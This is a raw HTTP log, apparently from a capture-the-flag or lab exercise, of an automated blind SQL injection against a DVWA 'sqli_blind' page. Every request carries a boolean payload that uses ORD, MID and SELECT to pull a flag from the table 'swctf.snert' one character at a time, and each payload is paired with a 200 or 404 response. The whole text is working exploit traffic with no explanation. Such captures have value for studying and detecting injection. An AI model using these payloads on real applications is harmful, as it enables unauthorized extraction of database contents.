HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>115 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>113 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>72 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>60 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>54 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>51 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>49 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>87 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>117 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>109 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>108 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>98 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>97 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>108 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>110 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>111 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>72 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>84 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>90 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>93 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>94 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>95 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>115 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>101 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>115 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>115 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>1 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>24 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>36 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>42 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>45 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>46 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>87 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>97 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>92 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>94 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>95 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>32 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>56 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>60 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>62 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>63 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>32 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>56 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>52 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>54 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>53 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>87 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>67 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>57 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
